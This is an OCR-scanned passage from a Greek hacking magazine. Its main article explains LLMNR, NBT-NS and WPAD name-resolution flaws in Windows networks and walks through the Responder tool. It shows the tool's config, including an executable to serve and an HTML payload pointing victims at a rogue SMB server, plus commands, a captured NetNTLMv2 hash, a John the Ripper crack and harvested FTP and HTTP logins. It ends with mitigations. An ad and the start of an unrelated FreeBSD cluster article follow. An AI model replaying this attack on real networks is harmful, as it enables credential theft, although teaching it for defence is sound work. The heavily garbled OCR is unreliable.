τοπικού δικτύου να χρησιμοποιούν τον ἴδιο κωδικό, παντού. Είναι φανερό λοιπόν ότι 
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Τοπικά δίκτυα Windows: Εν γένει επισφαλή 


σε ένα τέτοιο δίκτυο µια επιτυχημένη επίθεση, που είχε ως στόχο κάποιον µεμονω- 
μένο χρήστη, ενδέχεται ν’ ανοίξει δρόμους για την επίθεση και σε άλλα συστήµατα 
του δικτύου — ίσως και σε κάποιον Server. 


Αυτή τη фора Ва προσπεράσουµε την κλασική επίθεση ARP poisoning, για την οποία 
άλλωστε έχουµε γράψει και στο παρελθόν (βλ., π.χ. τεύχος 001),καιθα εξετάσουμε 
μια επίθεση που στηρίζεται στις αδυναμίες άλλων πρωτοκόλλων. Συγκεκριµένα, 
θα χρησιμοποιήσουμε το εργαλείο Responder, το οποίο κατασκευάστηκε στα εργα- 
στήρια Spiderlabs της εταιρείας Trustwave, και στοχεύει ορισμένα πρωτόκολλα δι- 
κτύωσης των Windows. 


Επιθέσεις ΜΙΤΜ, γενικά 


Σε παλαιότερη ανάρτησή του, ο δημοφιλής κρυπτογράφος Bruce Schneier περιέγρα- 
(pg μία πολύμηνη απάτη από μέρους της Κολομβιανής κυβέρνησης, µε στόχο τη Oc 
άσωση δεκαπέντε ομήρων που κρατούσε η ομάδα ανταρτών FARC. Στο επίκεντρο 
αυτής της απάτης βρισκόταν µια κλασική Man in The Middle Attack: 


Το σχέδιο ήταν πολύ πιθανόν να δουλέψει καθως, για μήνες, σε µια επιχείρηση που ένας 
αξιωματικός του στρατού ήταν το "χαλασμένο τηλέφωνο", οι υπηρεσίες ασφάλειας κατά- 
φεραν να πείσουν τον αντάρτη Gerardo Aguilar (γνωστό κι ως Cesar) ότι επικοινωνούσε 
ue την επταμελή γραμματεία της οργάνωσης. Οι υπηρεσίες πληροφοριών την ἴδια στιγµή 
έπεισαν τους ηγέτες της FARC πως επικοινωνούσαν µε τον Cesar. Στη πραγματικότητα, 
και οι δύο μιλούσαν µε τις υπηρεσίες πληροφοριών του στρατού της Κολομβίας. 


Το σχέδιο δούλεψε, καθώς ούτε ο Cesar αλλά ούτε και η ηγεσία της οργάνωσης γνωρί- 
ζονταν καλά μεταξύ τους. Δεν αναγνώριζαν τις φωνές, ενώ δεν είχαν και κάποια φιλική 
σχέση που θα μπορούσε να τους κάνει να αναγνωριστούν. Οι επιθέσεις ΜΙΤΜ μπορούν 
va καταπολεμηθούν µε κανόνες επικοινωνίας και αναγνώρισης, τους οποίους όµως οι 
αντάρτες της FARC δεν είχαν, 


Σε éva MITM attack, ο επιτιθέμενος βάζει τον εαυτό του ανάµεσα σε µια επικοινω- 
γία μεταξύ δύο σημείων. Καθένα апо τα δύο µέρη πιστεύει ότι επικοινωνεί µε TO 
άλλο, µόνο που ο επιτιθέµενος µπορεί να ακούει й να αλλάζει το περιεχόµενο της 
επικοινωνίας κατά βούληση. Υπάρχουν δύο είδη επιθέσεων MITM: n ενεργητική και 
η παθητική. Στην ενεργητική o επιτιθέµενος προσπαθεί να αλλάξει το περιεχόµε- 
νο της επικοινωνίας, αλλοιώνοντας τα μηνύματα που υποκλέπτει. Αντίθετα, στην 
παθητική απλά ακούει -ενδεχοµένως και καταγράφει- την κίνηση του δικτύου, XW- 
ρίς να αλλάζει το περιεχόµενο. Αυτό το στοιχείο κάνει την παθητική επίθεση πολύ 
πιο αθόρυβη, δίνοντας την ευκαιρία στο ενδιάµεσο κακόβουλο µέρος να μείνει πιο 
πολλή copa στο δίκτυο χωρίς να γίνει αντιληπτό. H επίθεση που περιγράφουµε ото 
παρόν άρθρο είναι µια παθητική επίθεση MITM. 
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Το πρόβλημα 


Στα τοπικά ñ αν θέλετε εσωτερικά δίκτυα, όπου κατά κύριο λόγο υπάρχουν συστή- 
рата Windows, συναντάμε δύο υπέροχα πρωτόκολλα. Αμφότερα επιτρέπουν σε 
έναν επιτιθέµενο να τα εκμεταλλεύεται, µέσω MITM attacks, WOTE να υποκλέπτει 
password hashes κι άλλες ενδιαφέρουσες πληροφορίες. 


Av ουπολογιστής σας τρέχει Windows, ro ruo πιθανό είναι πως έχει ενεργοποιημένα 
τα πρωτόκολλα! ΙΙ ΜΝΗ και NBT-NS. Αν δεν τα έχετε ακούσει ξανά, είναι γιατί ούτε 
ο υπολογιστής σας αλλά ούτε και то δίκτυο στο χώρο της εργασίας σας τα χρειάζε- 
ται. Τα πρωτόκολλα αυτά είναι σχεδιασμένα για name resolution. 


Link-Local Multicast Name Resolution (LLMNR). Το LLMNR είναι εξ ορισμού ενεργο- 
ποιηµένο κι επιτρέπει τόσο σε IPv6 όσο και σε IPv4 μηχανήματα у αναζητούν άλλα 
μηχανήματα στο εσωτερικό δίκτυο, χωρίς την παρουσία DNS server. To πρωτόκολ- 
Ло χρησιμοποιήθηκε πρώτη φορά στα Windows Vista κι ἔχει ενσωματωθεί και στις 
επόμενες εκδόσεις των Windows. Περιγράφεται αναλυτικά στο ВЕС 4795. 


NetBIOS Name Service (NBT-NS). To NBT-NS είναι éva πρωτόκολλο περίπου (Oto µε 
TO LLMNR, αλλά δουλεύει рохо үа συστήµατα IPv4 και είναι συνυφασμένο περισσό- 
τερο µε Windows ΧΡ boxes. 


Όταν ένας υπολογιστής Windows χρειάζεται v' αναζητήσει ένα όνοµα στο δίκτυο ñ 
µια διεύθυνση, κοιτάζει σε τρία µέρη. Πρώτα στο τοπικό αρχείο hosts. Έπειτα ρω- 
τάει τους DNS servers του δικτύου. Отау αποτύχουν αυτά τα δύο, ρωτάει στο εσω- 
τερικὀ δίκτυο εκπέμποντας NetBIOS queries, στα οποία οποιοσδήποτε υπολογιστής 
εντός τοπικού δικτύου έχει δυνατότητα у απαντήσει. 


Ας υποθέσουμε ότι éva µηχάνηµα Windows προσπαθεί να συνδεθεί oro share ovó- 
ματι Wileserver. Στο αρχείο hosts δεν υπάρχει πληροφορία για ro rt µπορεί να είναι 
αυτό ro "fileserver", αλλά ούτε και κάποιος DNS server γνωρίζει κάτι. Ακριβώς γι 
αυτό, γίνεται éva broadcast request εντός του τοπικού δικτύου. Αν ο υπολογιστής 
με ro Wileserver βρίσκεται στο ίδιο δίκτυο, θα απαντήσει και η σύνδεση θα επιτευ- 
χθεί µε βάση ro authentication που προβλέπεται апо το πρωτόκολλο SMB. Το {бо 
θα γίνει κι αν αναζητηθεί από το χρήστη µία διεύθυνση ή éva буора πόρου, για то 
οποίο δεν υπάρχουν πληροφορίες oro hosts ή στον DNS server. Στην πραγματικότη- 
τα, αυτή η δυνατότητα για εκπομπή requests αποτελεί ένα κενό ασφαλείας. Праү- 
ματι, απαντώντας κάποιος θετικά σε ένα σχετικό query, εἶναι σε θέση να λάβει τα 
credentials του (υποψήφιου) θύματος ή ακόµη και να του σερβίρει σελίδες µε κακό- 
βουλο περιεχόµενο. 


Το κενό ασφαλείας υφίσταται γιατί, όπως o Cesar έκανε µε τους αρχηγούς της 
FARC, ἐτσι και οι υπολογιστές στο τοπικό δίκτυο στέλνουν broadcast requests στο 
δίκτυο και Ἀοποιοσδήποτε3 µπορεί у απαντήσει, χωρίς κανέναν έλεγχο για то αν το 
σύστηµα που απαντά είναι πράγματι αυτό που ισχυρίζεται πως εἰναι. Έτσι, όταν για 
παράδειγµα o Bob ψάξει στο δίκτυο για την Alice, ἕνας Responder εἶναι σε θέση у 
απαντήσει λέγοντας πως αυτός είναι η Alice (> т.Е. Ωραία, βολικά ονόματα :D). O Bob 
τότε θα στείλει ra credentials του, woTe να προχωρήσει το SMB authentication. Та 
hashes που θα βρεθούν va τριγυρνάνε στο δίκτυο είναι της µορφής LM, NTLMvI ñ 
ΝΤΙ Μν2. Χρησιμοποιώντας προγράµµατα σπασίµατος κωδικών, όπως το John The 
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Ripper ñ το HashCat, αρκετοί κωδικοί αποκαλύπτονται µέσα σε μερικά λεπτά. Σε 
παλαιότερες εκδόσεις των Windows, ο κακόβουλος χρήστης µπορεί να καταφύγει 
σε επιθέσεις τύπου pass-the-hash: Απλά 8a συνδεθεί στο θύμα δίνοντας το hash 
που έχει υποκλέψει, χωρίς να γνωρίζει ro ἰδιο το password. Να μην ξεχνάμε πως 
στα περισσότερα εταιρικά δίκτυα οι κωδικοί που θα βρεθούν είναι ἰδιοι, αφού ποιος 
δίνει σημασία τώρα στο όποιο password policy... Έτσι, ο οποιοσδήποτε χρήστης του 
εταιρικού δικτύου εἶναι σε θέση, παίρνοντας éva ένα ra hashes από τα μηχανήματα, 
να φτάσει ακόµη και στον Domain Controller του δικτύου. 


Ένα άλλο πρωτόκολλο που πολύ αγαπάνε οι κακόβουλοι χρήστες ενός τοπικού 
δικτύου, εἶναι το WPAD (Web Proxy Auto-Discovery Protocol, βλ. και σχετικό άρθρο 
στο τεύχος 012). Και ναι, εἶναι κι αυτό εξ ορισμού ενεργό σε όλα τα συστήµατα µε 
Windows 2000 ή νεότερο. Το πρωτόκολλο χρησιμεύει προκειµένου να ρυθμίζεται 
αυτόματα o proxy server για rov Internet Explorer. Περιοδικά, ο υπολογιστής στέλνει 
στο δίκτυο éva request της µορφής "wpad.«WindowsDomainName»". Av αυτή η TO- 
ποθεσία δε προσφέρεται από τον DHCP ή τον DNS server, τότε τα δύο γνωστά μας, 
πλέον, πρωτόκολλα, та LLMNR και NBT-NS, θ' αναλάβουν δράση και θα εκπέμψουν 
το αἰτημα. Η κατάληξη εἶναι γνωστή. Κάποιος κακόβουλος εἶναι σε θέση ν' απαντή- 
σει µε αποτέλεσµα όλη η HTTP κίνηση του workstation να περνά απ αυτόν. 


Το εργαλείο για τις επιθέσεις 


Όπως ήδη αναφέραμε, ο Responder siv' ένα εργαλείο που αναπτύχθηκε στα 
SpiderLabs της εταιρείας Trustwave. Παρότι υπάρχουν διάφορα προγράµµατα για 
να πραγματοποιούνται επιθέσεις МІТМ, ot άνθρωποι των SpiderLabs ανέπτυξαν ένα 
που τα κάνει όλα - και τα κάνει καλά. Είναι γραμμένο σε Python κι έχει πολλές ενδι- 
αφέρουσες επιλογές. Εκτός апо τη βασική του λειτουργία, που είναι η απάντηση σε 
ερωτήματα LLMNR και NBT-NS, υλοποιεί κι αρκετούς authentication servers, όπως, 
π.χ. για та πρωτόκολλα SMB, MSSQL, HTTP(S) και FTP. 


Χρησιμοποιώντας αυτούς τους rogue servers, απαντά ora ανυποψίαστα workstations 
που ζητάνε διάφορους πόρους στο δίκτυο. Μπορεί επίσης να εκτελέσει άψογα την 
επίθεση WPAD που περιγράψαµε πιο πάνω, υποκλέπτοντας τη κίνηση των θυμάτων 
που ανυποψίαστα περιηγούνται στο Internet. Επίσης, έχει τη δυνατότητα να μπαίνει 
σε Analyze mode, αναλύοντας το δίκτυο πριν επιτεθεί. 


Н χρήση του εἶναι αρκετά απλή και η ρύθμιση της συμπεριφοράς του γίνεται είτε 
апо το command line είτε апо ro configuration file που διαθέτει. Το αρχείο ρυθµίσε- 
ων εἶναι το Responder.conf. Στις πρώτες γραμμές βρίσκονται οι επιλογές για τους 
authentication servers που θέλουμε να εἶναι ενεργοποιημένοι. 


[Responder Core] 
; Set these values On or Off, to set which rogue authentication server is used. 
SQL Ξ On 


17 


YV HAQKER 


SMB = On 

Kerberos = On 

FTP = On 

POP = On 

ο Пелеа Grm 25/1 p. SY»? 
SMTP = On 

IMAP - On 

HTTP Ξ On 

HTTPS - On 

DNS - On 

LDAP - On 

;Set a custom challenge 
Challenge - 1122334455667788 
;Set this to change the default logging file 


SessionLog Ξ Responder-Session.log 


;Set this option with your in-scope targets (default - All). Example: RespondTo 
= OA 1 5 3119. О 22] 5 ο ΠΠ ОЕ ОТТЕ 0204124182 


;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 
RespondTo - 


;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). 
Example: RespondTo - WPAD,DEV,PROD,SQLINT 


;RespondTo - WPAD,DEV,PROD,SQLINT 

RespondToName - 

;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 
DontRespondTo - 


;Set this option with specific NBT-NS/LLMNR names not to respond to (default - 
None). Example: DontRespondTo - NAC, IPS, IDS 


DontRespondToName - 


Στην επιλογή Challenge, o χρήστης βάζει ша rur] yta TO πρωτόκολλο ΝΤΙ Μν2. H πιο 
συνηθισμένη τιμή εἶναι αυτή που ήδη υπάρχει στο αρχείο καιπροτείνεταινατην αφή- 
σουµε ως έχει. H επιλογή SessionLog αφορά στο πού θα αποθηκεύεται το αρχείο Ka- 
ταγραφής, µε όλες τις ενέργειες που έχουν γίνει. Οι επιλογές RespondToName και 
DontRespondToName εἶναι απαραίτητες, uxore ro Responder να ξέρει ποια requests 
θα λαμβάνει υπόψη και θα απαντά, καθώς και ποια θα αγνοεί. Οι δε RespondTo και 
DontRespondTo είναι χρήσιμες, προκειµένου ro Responder να γνωρίζει σε ποιους 
υπολογιστές θα δίνει σημασία καθώς και ποιους θα αγνοεί. 
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[HTTP Server] 
;Set this to On if you want to always serve a specific file to the victim. 
Serve-Always - Off 


;Set this to On if you want to serve an executable file each time a .exe is 
detected in an URL. 


Serve-Exe - Off 

;Uncomment and specify a custom file to serve, the file must exist. 
Filename = Denied.html 

;Specify a custom executable file to serve, the file must exist. 


ExecFilename = FixInternet.exe 


;Set your custom PAC script 


WPADScript = function FindProxyForURL(url, host)(if ((host == 

"localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") 

|| isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, 
"RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return 
"DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';) 


;HTML answer to inject. 


;In this example, we redirect the browser to our rogue SMB server. Please 
consider the "RespProxySrv" string when modifying, it is used in conjunction 
with WPADScript so no proxy will be used for this host.Also, the HTML has to be 
in this format "«html» Payload goes here...«/html»". 


HTMLToServe = «html»«head»«/head»«body»«img srcz'file: \\\\\КеѕрРгохуЅгу\ѕѕед\ 
seyad.ico' alt-'Loading' height-z'1' width-z'2'»«/body»«/html» 


[HTTPS Server]V 

;Change to use your certs 
cert = Certs/responder.crt 
key = Certs/responder.key 


Н επιλογή Serve-Always χρησιμεύει όταν επιθυμούμε va στέλνουµε ένα συγκεκριµέ- 
νο αρχείο στο θύμα, µέσω του HTTP server. H δε Serve-Exe, όταν θέλουμε να στέλ- 
VOULE κάποιο εκτελέσιμο. Έτσι, µέσα апо τις επιλογές Filename και ExecFilename 
ορίζεται η τοποθεσία των αρχείων που θα αποστέλλονται στο (υποψήφιο) θύμα. 


Οι επιλογές WPADScript και HTMLToServe αφορούν στη τοποθεσία όπου ro θύμαθα 
βρει τις ρυθμίσεις για το διακομιστή διαµεσολάβησης, αλλά και τον κώδικα HTML 
που θα εισαχθεί στην απάντηση προς το θύμα. Τέλος, στην περίπτωση όπου χρησι- 
μοποιείται το НТТР, οι επιλογές cert και key αφορούν στις θέσεις όπου βρίσκονται 
τα ήδη δημιουργημένα κλειδιά και πιστοποιητικά. 


Οι κυριότερες επιλογές rou Responder στο command line είναι οι ακόλουθες. 
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-A, --analyze 


Το εργαλείο τρέχει σε κατάσταση ανάλυσης. O επιτιθέµενος µπορεί να δει τα αιτή- 
рата NBT-NS και LLMNR, χωρίς να επηρεάζει τη κίνησή τους. 


-i 10.20.30.40, --ip-10.20.30.40 


Н διεύθυνση IP όπου θα ανακατευθύνεται η κίνηση. Συνήθως εἶναι αυτή που έχει то 
μηχάνημα του επιτιθέµενου. 


-I eth0, --interface=eth0 
Το δικτυακό ενδιάµεσο (network interface) απὀ ro οποίο θα ακούει ro Responder. 
-b, --basic 


Αυτή η επιλογή αφορά στο βασικό HTTP authentication. Αν τεθεί -b 1, τότε στα θύμα- 
τα Ва εµφανίζεται παράθυρο εισαγωγἠς πιστοποιητικών χρήστη. 


-f, --fingerprint 


Με αυτή την επιλογή εμφανίζονται οι υπολογιστές που εκπέμπουν ερωτήματα NBT- 
NS ММА. 


-W, --wpad 
Ξεκινά τον διακομιστή WPAD, ο οποίος στέλνει τις ρυθµίσεις του WPAD proxy. 


Παράδειγμα επίθεσης 


Παρουσιάζουµε εν τάχει éva σενάριο επίθεσης σε δίκτυο Windows, µε τη βοήθεια 
του Responder. 


Έστω ότι βρισκόμαστε σε ένα εταιρικό δίκτυο µε αρκετά Windows boxes, όπως sni- 
σης και µε web και FTP server. Ξεκινάμε το Responder όπως φαίνεται στο ακόλουθο 
screenshot. Όπως βλέπετε, το πρόγραµµα πιάνει αµέσως δουλειά. 
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dE onder.py -i 192.168.1.142 
e/LLMNR Responder 2.0 


yForURL(url, host)[if ((host == "localhost 
) ||(host == "127.0.0.1") || isPlainHostName 
ainIs(host, "RespPr Srv") | | shExpMatch(h 
return "DIRECT"; return 'PROXY ISAProxySrv: 


via HTTP&WPAD: OFF 


Ξεκινάμε ro Responder ото Kali Linux και το πρόγραμμα πιάνει αµέσως δουλειά. 


Μετά апо κάποια ώρα κι έχοντας βάλει τη καφετιέρα να φτιάχνει καφέ, έχουµε TO 
πρώτο αποτέλεσµα. Είναι éva NetNTLMv2 hash! 


T] 
ALVAQ1 :1122334455667788 :E5644C9F6CFB2EA7BCOEBOAA7D9CEAF1 :0101000000000000E6000E43B468D00186785F8FF91730590000000002000] 
30645005206566045065200320630003000380004001600736060006200310632602E006C606F00636061066C6003062605306456052065600456 


3000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C0008003000300000000000000001000] 
3000020000078C4619D8D28D9781C70F58FE0716A3D2360419097487C1626169B9966ABFEAD0A001000000000000000000000000000000000000900220063006900660073002F007200656) 
373007000700072006F00789079007300720076000000090000009000) 


Μετά από λίγη wpa, ro Responder ψαρεύει ένα NetNTLMv2 hash! 


Γενικά, το "ortáotuo' ἡ αλλιώς η αντιστροφή των hashes δεν αποτελεί µια διαδικα- 
σία που εγγυημένα αποδίδει αποτελέσματα. Ίσως όµως αυτό ro συγκεκριµένο hash 
να µην προέρχεται апо κάποιο καλό password, αφού ο χρήστης που το εμπνεύστηκε 
ενδεχομένως να σκέφτηκε ότι βρίσκεται µέσα στο ασφαλές εταιρικό δίκτυο, οπότε 
δεν υπάρχει λόγος va πολυσκοτίζεται µε την επινόηση ισχυρών κωδικών. Εµπιστευ- 
ópaore λοιπόν το hash στα ἐμπειρα χέρια του John. 


4 john -format:netntlmv2 words.txt 
word hash (NTLMv2 C/R MD4 HM MD5 [32/64]) 
(test) 


0:15 DONE (Fri Маг 27 13:36:11 2015) с/5: 453992 trying: dadraf - debbb6 
option to display all of the cracked passwords reliably 


e "--show" 


To John The Ripper αναλαμβάνει τη λεγόμενη "αντιστροφή" του hash - και τα καταφέρνει! 
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Χωρίς va µας απογοητεύσει, µέσα oe δευτερόλεπτα o John σπάζει ro hash του χρή- 
στη, αποκαλύπτοντας το αρχικό password. Δεν επαναπαυόµαστε και συνεχίζουμε 
το ψάξιμο στο δίκτυο, χρησιμοποιώντας κι άλλες επιλογές του Responder. 


rootükalishi: # ./Responder.py -i 192.168.1.142 -b 1 -w On -r 1 -ν 
NBT Name Service/LLMNR Responder 2.0. 


send bugs/comments to: lgaffie(itrustwave.com 
ο kill this script hit CRTL-C 


To Responder είναι έτοιμο ν' απαντήσει µε πληροφορίες για rov proxy, τον οποίο εναγωνίως αναζητά o Internet Explorer. 


Αυτή τη φορά o Responder εἶναι έτοιμος у απαντήσει µε πληροφορίες για тоу proxy, 
εκμεταλλευόμενος την "αφέλεια" του πρωτοκόλλου WPAD που χρησιμοποιεί o 
Internet Explorer. 


To web traffic rou Internet Explorer περνά από το μηχάνημα µε rov Responder. 


Μετά από λίγο έχουµε éva τυχερό, οπότε μπορούμε vq βλέπουμε όλες τις κινήσεις 
που πραγματοποιεί το θύμα µέσα από τον web browser. 


Οι υπηρεσίες σε éva δίκτυο Windows συνήθως διαθέτουν *kar* ονόματα NetBIOS 
(π.χ., FTPSERVER). Όταν ένας χρήστης ζητά κάποιο resource, όπως, T.X., évav FTP 
Й HTTP server, o Responder εἶναι σε θέση να του απαντά ο ἰδιος. Σκοπός του επιτι- 
θέμενου εἶναι η αλίευση usernames kat passwords, τα οποία τα υποψήφια θύματα 
πληκτρολογούν σε σχετικά prompts που εμφανίζει ο Responder. Δείτε τα ακόλουθα 
screenshots. 


PS C:N> ftp FIPSERUER 

onnected to FTPSERUER. 

Ρ28 Welcome 

ser KFTPSERUER:€none?5: deltahacker 
B31 User name okay, need password. 


assword: 

b38 User not logged in. 
ogin failed. 

tp? 


To θύμα επιχειρεί σύνδεση στον FTP server, πληκτρολογώντας username kat password. 
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eltahacker 


Στην πραγματικότητα, τα στοιχεία σύνδεσης στον FTP server ra καταγράφει o Responder. 


iexplore 
The server 192.168.1.142 is asking for your user name and password. The 
server reports that it is from ". 


Warning: Your user name and password will be sent using basic 
authentication on a connection that isn't secure. 


| User name 


| Password 


[ ] Remember my credentials 


Cancel 


Οµοίως, то θύμα δίνει ra στοιχεία του προκειµένου у αποκτήσει πρόσβαση σε ένα web application... 


[+]НТТР GET request from : 192.168.1.204. The HTTP URL requested was: / 
[*]HTTP-User ἃ Password: deltahacker:delatahacke 


αλλά ra στοιχεία αυτά ra καταγράφει o Responder! 


Μέτρα προστασίας 


To πως µπορεί να προστατεύσει κανείς éva τοπικό δίκτυο από επιθέσεις MITM µε 
εργαλεία σαν ro Responder, εἶναι αρκετά απλό. Άλλωστε, όπως είπαμε και στην 
αρχή, στην πλειονότητατων περιπτώσεων επισφαλή πρωτόκολλατουστιλ! LLMNR, 
NBT-NS δεν τα χρειαζόμαστε. Βέβαια οι εχθροί εδώ εἰναι η άγνοια, η αμέλεια και η 
σαθρή πεποίθηση πως "αυτά συμβαίνουν αλλού’. Πάντως боо: διαχειριστές θελή- 
σουν να πάρουν µέτρα προστασίας, οφείλουν να φροντίσουν για ra ακόλουθα: 
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* Εφαρμογή και τήρηση ενός επαρκούς password policy 

* Απενεργοποίηση των LLMNR broadcasts σε όλα τα μηχανήματα 

* Απενεργοποίηση των NBT-NS broadcasts σε όλα τα μηχανήματα, µέσω της 
απενεργοποίησης του NetBIOS 


* Απενεργοποίηση της αυτόματης ανάκτησης ρυθμίσεων proxy, µέσω TOU πρω- 
τοκόλλου WPAD 


Н απενεργοποίηση του LLMNR µπορεί va γίνει από το κατάλληλο registry key: 
HKLM\Software\Policies\Microsoft\Windows NTWXDNSClient "EnableMulticast" DWORD 0 


Εναλλακτικά, γίνεται και απὀ το αρχείο gpedit.msc. 
Πα To NBT-NS, ro registry key είναι: 


HKEY LOCAL МАСНІМЕ\ Ѕуѕ ёет\СиггепЕСопёго15её\Ѕегуісеѕ\№їВТ\Рагатетегѕ\ 
Interfaces "NetbiosOptions" DWORD 2 


Μπορείτε va ro απενεργοποιήσετε και µε την επιλογή Disable NetBIOS over TCP/IP, 
η οποία βρίσκεται στις ρυθμίσεις rou network interface που χρησιμοποιεί ro µηχά- 
упра. (H ἴδια η Microsoft έχει δώσει éva script για την απενεργοποίηση του NBT-NS.) 


Па το WPAD υπάρχουν δύο δυνατότητες. Н μία εἶναι ένας τοπικός DNS server που 
δίνει ο ἰδιος τις ρυθμίσεις για rov proxy. Αν αυτό δεν είναι δυνατόν, τότε προτείνεται 
η απενεργοποίηση του WPAD апо το gpedit.msc. 


Οι προηγούμενες κινήσεις "τυφλώνουν” εργαλεία σαν το Responder, ενισχύοντας 
την ασφάλεια των χρηστών του τοπικού δικτύου. 


Συμπερασματικά, γίνεται φανερό ότι τα πολλά features δεν λειτουργούν υπέρ της 
ασφάλειας. Πράγματι, καταφεύγοντας σε απλά προγράµµατα όπως το Responder, 
εντελώς αθόρυβα και χωρίς τη χρήση δύσκολων τεχνικὠν ἡ ψαγμένων exploits, 
ἕνας κακόβουλος χρήστης έχει τη δυνατότητα να φτάσει ακόµα και στον κεντρικό 
server ενός τοπικού δικτύου. Τελικά, το ηθικό δίδαγμα όσον αφορά στην ασφάλεια, 
για άλλη µια φορά εἰναι ἴδιο: ότι δεν χρησιµοποιείται πρέπει να απενεργοποιείται. 
Less is more! 
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4 
DigitalOcean 


Ταχύτατα VPSes στο cloud, σε hosts µε δίσµους SSD. 
Επιθογή datacenter σε Ευρώπη, Αμεριμή μαι Ασία. 
Lean-mean control panel, για απόῆυτο éneyxo. 


Αποητήστε τώρα το δικό oas VPS, 

στο cloud της DigitalOcean. 

Κάντε KAIK στο http://bit.ly/digocean10off 
μαι κερδίστε αυτομάτως 105 σε credit. 


Hint: Επιβέγοντας το µιμρό πϑάνο, 

πάντα µε KAIK στο http://bit.ly/digocean10off, 
ουσιαστικά έχετε δύο µήνες δωρεάν για ένα VPS 
µε 512MB RAM, 20GB SSD μαι 1TB transfer. 


ES Δεν είναι кї ἄσχημα 


Skill: Intermediate 
Tags: 041, S3FS, ownCloud, certificates, certificate authority, BitTorrent Sync 


Το прото σας FreeBSD 
Beowulf Cluster 


by Sonic 


Στο прото µέρος του Aiolos Project, στο τεύχος 040, δώσαμε µια µικρή 
γεύση апо τα Beowulf Clusters αλλά και апо το (φιλόδοξο) σχέδιό µας va 
κατασκευάσουµε ένα, στο πλαίσιο σχολικού πρότζεκτ. Είµαστε πλέον στην 
ευχάριστη θέση να σας ενημερώσουμε ότι το εγχείρημα στέφθηκε µε επιτυχία 
και το Aiolos Project είδε για πρώτη φορά τους πυρήνες rou να ενεργοποιούνται 
στις 12/03/2015! 


Το cluster εκτέλεσε µε επιτυχία το απλό hellompi.py, το αντίστοιχο του Hello World 
για ΟΡΕΠΜΡΙ καταστάσεις. Πριν φτάσουμε βέβαια σε αυτή την επιτυχημένη δοκιμή, 
χρειάστηκε αρκετή προσπάθεια: 


Το όλο εγχείρημα δοκιμάστηκε oro Virtual Aiolos, µια εκδοχή rou Aiolos cluster που 
δημιουργήσαμε σε περιβάλλον VirtualBox. Στο Virtual Aiolos γράψαμε και τις ana- 
ραίτητες σημειώσεις pe τις οποίες οι µαθητές ρύθμισαν τα μηχανήματα rou cluster. 


* Οαγαπητός συνοδοιπόρος oro Aiolos Project, Ηλίας Χρυσοχέρης, σχεδίασε και 
κατασκεύασε την πλακέτα διανομής τροφοδοσίας: To Aiolos Cluster τροφοδο- 
τείτρεις μητρικές, τρεις δίσκους κι έναν μεταγωγέα δικτύου (switch), από éva 
και μόνο τροφοδοτικό ΡΟ. Η πλακέτα διανομής τροφοδοσίας ουσιαστικά χω- 
piger την μονή 24pin τροφοδοσία σε τρεις, ενώ ταυτόχρονα παράγει τα 7.5 Volt 
που απαιτούνται απὀ το switch. Στην πλακέτα αυτή δώσαμε το πιασιάρικο και 
ψαρωτικὀ όνομα UPB (Unified Power Board, ναι είμαστε "λίγον ψώνια). 


* Οι µαθητές είχαν κάνει, σε προηγούμενες συναντήσεις και κατά τη διάρκεια 
των μαθημάτων, τη βασική εγκατάσταση του FreeBSD και στους τρεις δίσκους 
των compute nodes. 
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* О γράφων εγκατέστησε ro master node στο λαπτοπ του. Εγκαταστάθηκε και 
γραφικό περιβάλλον KDE, ενώ ρυθµίστηκε ώστε να παρέχει έναν κοινόχρη- 
στο κατάλογο µέσω ΝΕς. 


Με όλα τα πράγματα που θα μπορούσαν va πάνε στραβά στα παραπάνω, о νόμος του 
Мёрфи κυριολεκτικά µας ξέχασε: Όλα λειτούργησαν όπως έπρεπε από την πρωτη 
κιόλας δοκιμή! 
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Εικόνα 1. To Aiolos Cluster: Οι τρεις μητρικές 
στηριγμένες κι ευθυγραμμισμένες σε ντίζες. 
Αναμένεται να μπουν στο plexiglass για την 
ολοκλήρωση της κατασκευής. 
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Υλικό Aiolos Project, µέρος 2 


Όπως είπαμε ήδη, ro Aiolos Project διαθέτει τρεις μητρικές үа ra compute nodes. Οι 
δύο апо αυτές είναι ολόιδιες αλλά η µία εἶναι παλιότερη και αισθητά πιο αργή (µην 
το πείτε παραέξω). Όλες εἰναι σε mini-ITX form factor και ара εξαιρετικά μικρές. 
Καμιά δεν διαθέτει ανεμιστήρα, καθώς οι επεξεργαστές τους (Atom / Celeron) είναι 
ιδιαίτερα αποδοτικοί και καταναλώνουν ελάχιστο ρεύμα: αυτό το χαρακτηριστικό 
τους άλλωστε µας επιτρέπει να τις τροφοδοτήσουµε από ένα μόνο τροφοδοτικό. 


Είχαμε από την αρχή αποφασίσει ότι οι μητρικές θα τοποθετηθούν σε µια διάταξη 
τύπου Stack, η µια πάνω απὀ την άλλη, µε κατάλληλο διάκενο το οποίο θα εξασφα- 
λίζει τόσο την ψύξη όσο και τη διασύνδεση των καλωδίων τροφοδοσίας και των 
σκληρών δίσκων. Σε κάθε περίπτωση, προμηθευτήκαμε καλώδια SATA 90 εκατο- 
στων (ευτυχώς που υπάρχει ro eBay) για va είμαστε σίγουροι ότι θα φτάσουν από 
κάθε µητρική µέχρι τη βάση της κατασκευής (που στεγάζει δίσκους, switch και rpo- 
φοδοτικό). 


Οι μητρικές στηρίχτηκαν σε τέσσερις ντίζες, χρησιμοποιώντας ροδέλες και παξι- 
μάδια. Το επίπονο έργο της ευθυγράμμισης και ρύθμισης των αποστάσεων ανέλαβε 
о γνωστός FreeBSDer μαθητής του τοµέα Ηλεκτρονικής, Νίκος Καμπουράκης. To 
τελικό αποτέλεσµα το βλέπετε στην εικόνα 1. 


Σε δεύτερη φάση, το όλο σύστημα θα συναρµολογηθεί σε plexiglass, το οποίο Ва 
δώσει και την απαραίτητη σταθερότητα. Μπορείτε να πάρετε pta ιδέα για TO πως 
θα δείχνει oro screenshot апо ro Blender, που δημιούργησε ο Ηλίας Χρυσοχέρης (βλ. 
εικόνα 2). 


Εικόνα 2. Μια δημιουργική απεικόνιση rou Aiolos cluster στην τελική του µορφή, 
µέσα απὀ την εφαρµογή blender. 
